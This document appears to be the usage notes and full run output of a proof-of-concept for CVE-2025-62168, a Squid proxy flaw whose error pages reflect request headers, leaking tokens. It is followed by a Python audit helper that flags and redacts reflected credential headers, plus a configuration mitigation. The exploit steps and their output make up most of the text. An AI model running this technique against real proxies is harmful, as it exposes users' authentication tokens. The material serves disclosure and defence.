# activate venv
cd ~/CVE-2025-62168
source .venv/bin/activate
# usage: python3 cve-2025-62168.py
usage: cve-2025-62168.py [-h] [--proxy PROXY] [--verbose]
PoC for CVE-2025-62168 — Squid Proxy token leak via error page header reflection.
options:
-h, --help show this help message and exit
--proxy PROXY Proxy URL (e.g. http://127.0.0.1:3128)
--verbose Enable technical debug output
Example:
python3 cve-2025-62168.py --proxy http://127.0.0.1:3128 --verbose
[!] Missing required argument: --proxy
# run: python3 cve-2025-62168.py --proxy http://ip.server:port
python3 cve-2025-62168.py --proxy http://127.0.0.1:3128
------------------------------------------------------------
STEP 1 — Connecting to proxy...
------------------------------------------------------------
Proxy: http://127.0.0.1:3128
------------------------------------------------------------
STEP 2 — Sending request with injected token...
------------------------------------------------------------
Injected Header: X-Test-Leak: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.ewo...
------------------------------------------------------------
STEP 3 — Server responded, extracting error page...
------------------------------------------------------------
------------------------------------------------------------
STEP 4 — Parsing mailto block from Squid error page...
------------------------------------------------------------
mailto:webmaster?subject=CacheErrorInfo%20-%20ERR_READ_ERROR&body=CacheHost%3A%20poc-linux%0D%0AErrPage%3A%20ERR_READ_ERROR%0D%0AErr%3A%20%5Bnone%5D%0D%0ATimeStamp%3A%20Tue,%2025%20Nov%202025%2014%3A32%3A29%20GMT%0D%0A%0D%0AClientIP%3A%20127.0.0.1%0D%0A%0D%0AHTTP%20Request%3A%0D%0AGET%20%2F%20HTTP%2F1.1%0AUser-Agent%3A%20krakhen.dev-cve-2025-62168-poc%0D%0AX-Test-Leak%3A%20eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.ewogICJzdWIiOiAiMTIzNDU2Nzg5MCIsCiAgIm5hbWUiOiAia3Jha2hlbi5kZXYiLAogICJhZG1pbiI6IHRydWUsCiAgImlhdCI6IDE1MTYyMzkwMjIKfQo.LspWRdaIXcXllUuABCsYXRqBoKseG5vlb_YIW259aiU%0D%0AAccept%3A%20*%2F*%0D%0AAccept-Encoding%3A%20gzip,%20deflate%0D%0AHost%3A%20nonexistent.krakhen-test.local%0D%0A%0D%0A%0D%0A
------------------------------------------------------------
STEP 5 — TOKEN LEAK CONFIRMED
------------------------------------------------------------
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.ewogICJzdWIiOiAiMTIzNDU2Nzg5MCIsCiAgIm5hbWUiOiAia3Jha2hlbi5kZXYiLAogICJhZG1pbiI6IHRydWUsCiAgImlhdCI6IDE1MTYyMzkwMjIKfQo.LspWRdaIXcXllUuABCsYXRqBoKseG5vlb_YIW259aiU
------------------------------------------------------------
STEP 6 — Decoding JWT token...
------------------------------------------------------------
Header:
{
"alg": "HS256",
"typ": "JWT"
}
Payload:
{
"sub": "1234567890",
"name": "krakhen.dev",
"admin": true,
"iat": 1516239022
}
Signature:
LspWRdaIXcXllUuABCsYXRqBoKseG5vlb_YIW259aiU
------------------------------------------------------------
DONE — PoC completed successfully.
------------------------------------------------------------
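
Added example, not part of the PoC: an audit helper for checking a saved Squid error page for the reflection shown in STEP 4 and STEP 5, reporting credential-like request headers echoed in the mailto link with their values redacted. The sample page, the placeholder token, the list of sensitive header names and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample: a shortened error-page link in the shape of the STEP 4
# output, carrying a made-up placeholder token rather than a real credential.
TOKEN = "eyJhbGciOiJub25lIn0.eyJzdWIiOiJkZW1vIn0.c2ln"
SAMPLE_PAGE = (
    '<a href="mailto:webmaster?subject=CacheErrorInfo%20-%20ERR_READ_ERROR'
    "&body=CacheHost%3A%20poc-linux%0D%0AErrPage%3A%20ERR_READ_ERROR%0D%0A"
    "HTTP%20Request%3A%0D%0AGET%20%2F%20HTTP%2F1.1%0A"
    "User-Agent%3A%20audit%0D%0AX-Test-Leak%3A%20" + TOKEN + "%0D%0A"
    'Host%3A%20example.invalid%0D%0A%0D%0A">webmaster</a>'
)

SENSITIVE_NAMES = {"authorization", "proxy-authorization", "cookie"}  # assumed list
JWT_RE = re.compile(r"^eyJ[\w-]+\.[\w-]+\.[\w-]+$")
HEADER_RE = re.compile(r"^([A-Za-z0-9-]+):\s*(.*)$")


def reflected_headers(page):
    """Return the request headers echoed in the mailto body of an error page."""
    link = re.search(r'mailto:[^"\'>\s]*?body=([^"\'>\s&]*)', page)
    if not link:
        return {}
    _, marker, request = unquote(link.group(1)).partition("HTTP Request:")
    if not marker:
        return {}
    headers = {}
    for line in request.splitlines():
        m = HEADER_RE.match(line.strip())
        if m:  # the request line ("GET / HTTP/1.1") does not match
            headers[m.group(1)] = m.group(2)
    return headers


def credential_findings(page):
    """List (header, redacted value) pairs that look like reflected secrets."""
    return [
        (name, value[:6] + "...[redacted]")
        for name, value in reflected_headers(page).items()
        if name.lower() in SENSITIVE_NAMES or JWT_RE.match(value)
    ]


if __name__ == "__main__":
    for name, redacted in credential_findings(SAMPLE_PAGE):
        print(f"reflected credential-like header: {name}: {redacted}")
```

If the check reports findings on your own proxy, setting `email_err_data off` in squid.conf stops Squid from including request data in the mailto link of its error pages.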